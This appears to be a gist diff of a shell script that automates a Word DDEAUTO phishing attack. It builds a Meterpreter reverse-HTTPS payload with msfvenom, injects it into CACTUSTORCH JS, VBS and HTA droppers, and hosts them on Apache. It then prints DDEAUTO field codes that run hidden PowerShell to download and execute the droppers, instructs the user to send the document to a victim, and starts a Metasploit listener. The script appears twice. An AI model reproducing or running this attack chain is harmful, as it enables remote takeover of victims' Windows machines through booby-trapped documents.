xillwillx · August 6, 2018 07:25 · xillwillx · Oct 22, 2017 · xillwillx · Oct 24, 2017
diff --git a/CactusTorchDDEAUTO.sh b/CactusTorchDDEAUTO.sh
 git clone https://github.com/mdsecactivebreach/CACTUSTORCH.git && cd CACTUSTORCH
 IP=`ip -4 addr show eth0 | grep -oP '(?<=inet\s)\d+(\.\d+){3}'`
 msfvenom -p windows/meterpreter/reverse_https LHOST=$IP LPORT=443 -f raw -o payload.bin
 PAYLOAD=$(cat payload.bin | base64 -w 0)
 sed -i -e 's|var code = ".*|var code = "'$PAYLOAD'";|' CACTUSTORCH.js
 sed -i -e 's|Dim code : code = ".*|Dim code : code = "'$PAYLOAD'"|g' CACTUSTORCH.vbs
 sed -i -e 's|Dim code : code = ".*|Dim code : code = "'$PAYLOAD'"|g' CACTUSTORCH.hta
 cp -t /var/www/html/ CACTUSTORCH.vbs CACTUSTORCH.js CACTUSTORCH.hta
 service apache2 start
 echo -e "\n\n\n\nOpen Microsoft Word and press CTRL+F9 and copy any of the payloads below in between the { } then save and send to victim.\n\nJS PAYLOAD:\n\
 DDEAUTO c:\\\\\Windows\\\\\System32\\\\\\\cmd.exe \"/k powershell.exe -w hidden -nop -ep bypass -Command" \(new-object System.Net.WebClient\).DownloadFile\(\'http:\/\/$IP\/CACTUSTORCH.js\',\'index.js\'\)\; \& start c:\\\\\\Windows\\\\\\\System32\\\\\\\\cmd.exe \/c cscript.exe index.js\" >payloads.txt
 echo -e "\nVBS PAYLOAD:\n\
 DDEAUTO c:\\\\\Windows\\\\\System32\\\\\\\cmd.exe \"/k powershell.exe -w hidden -nop -ep bypass -Command" \(new-object System.Net.WebClient\).DownloadFile\(\'http:\/\/$IP\/CACTUSTORCH.vbs\',\'index.vbs\'\)\; \& start c:\\\\\\Windows\\\\\\\System32\\\\\\\\cmd.exe \/c cscript.exe index.vbs\" >>payloads.txt
 echo -e "\nHTA PAYLOAD:\n\
 DDEAUTO C:\\\\\Programs\\\\\Microsoft\\\\\Office\\\\\MSword.exe\\\\\..\\\\\..\\\\\..\\\\\..\\\\\windows\\\\\system32\\\\\mshta.exe \"http://$IP/CACTUSTORCH.hta\"" >>payloads.txt
 clear 
 cat payloads.txt && rm payloads.txt
 msfconsole -qx "use exploit/multi/handler;set payload windows/meterpreter/reverse_https;set LHOST '$IP';set LPORT 443; set ExitOnSession false; set EnableStageEncoding true; exploit -j -z"
	git clone https://github.com/mdsecactivebreach/CACTUSTORCH.git && cd CACTUSTORCH
	IP=`ip -4 addr show eth0 \| grep -oP '(?<=inet\s)\d+(\.\d+){3}'`
	msfvenom -p windows/meterpreter/reverse_https LHOST=$IP LPORT=443 -f raw -o payload.bin
	PAYLOAD=$(cat payload.bin \| base64 -w 0)
	sed -i -e 's\|var code = ".*\|var code = "'$PAYLOAD'";\|' CACTUSTORCH.js
	sed -i -e 's\|Dim code : code = ".*\|Dim code : code = "'$PAYLOAD'"\|g' CACTUSTORCH.vbs
	sed -i -e 's\|Dim code : code = ".*\|Dim code : code = "'$PAYLOAD'"\|g' CACTUSTORCH.hta
	cp -t /var/www/html/ CACTUSTORCH.vbs CACTUSTORCH.js CACTUSTORCH.hta
	service apache2 start
	echo -e "\n\n\n\nOpen Microsoft Word and press CTRL+F9 and copy any of the payloads below in between the { } then save and send to victim.\n\nJS PAYLOAD:\n\
	DDEAUTO c:\\\\\Windows\\\\\System32\\\\\\\cmd.exe \"/k powershell.exe -w hidden -nop -ep bypass -Command" \(new-object System.Net.WebClient\).DownloadFile\(\'http:\/\/$IP\/CACTUSTORCH.js\',\'index.js\'\)\; \& start c:\\\\\\Windows\\\\\\\System32\\\\\\\\cmd.exe \/c cscript.exe index.js\" >payloads.txt
	echo -e "\nVBS PAYLOAD:\n\
	DDEAUTO c:\\\\\Windows\\\\\System32\\\\\\\cmd.exe \"/k powershell.exe -w hidden -nop -ep bypass -Command" \(new-object System.Net.WebClient\).DownloadFile\(\'http:\/\/$IP\/CACTUSTORCH.vbs\',\'index.vbs\'\)\; \& start c:\\\\\\Windows\\\\\\\System32\\\\\\\\cmd.exe \/c cscript.exe index.vbs\" >>payloads.txt
	echo -e "\nHTA PAYLOAD:\n\
	DDEAUTO C:\\\\\Programs\\\\\Microsoft\\\\\Office\\\\\MSword.exe\\\\\..\\\\\..\\\\\..\\\\\..\\\\\windows\\\\\system32\\\\\mshta.exe \"http://$IP/CACTUSTORCH.hta\"" >>payloads.txt
	clear
	cat payloads.txt && rm payloads.txt
	msfconsole -qx "use exploit/multi/handler;set payload windows/meterpreter/reverse_https;set LHOST '$IP';set LPORT 443; set ExitOnSession false; set EnableStageEncoding true; exploit -j -z"